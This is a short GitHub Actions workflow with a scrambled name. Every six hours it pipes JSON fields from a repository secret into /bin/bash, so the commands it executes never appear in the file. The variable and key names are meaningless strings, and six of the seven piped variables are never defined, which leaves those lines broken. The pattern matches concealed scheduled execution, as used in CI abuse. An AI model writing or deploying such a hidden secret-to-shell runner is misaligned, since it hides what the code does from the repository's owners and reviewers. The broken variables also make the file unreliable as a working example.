name: pousuanshami

on:
  workflow_dispatch:
  schedule:
    - cron: '52 1/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: pousuanshami
        env:
          h70794: ${{ secrets.h70794 }}
        run: |
          echo $h70794 | jq -r .whs08 | /bin/bash
          echo $vrce9 | jq -r .npsu9362 | /bin/bash
          echo $hi97171 | jq -r .jbby165 | /bin/bash
          echo $syol90 | jq -r .ronrj612 | /bin/bash
          echo $lldtp61905 | jq -r .m7 | /bin/bash
          echo $p1 | jq -r .raic992 | /bin/bash
          echo $vowsl766 | jq -r .zh6845 | /bin/bash

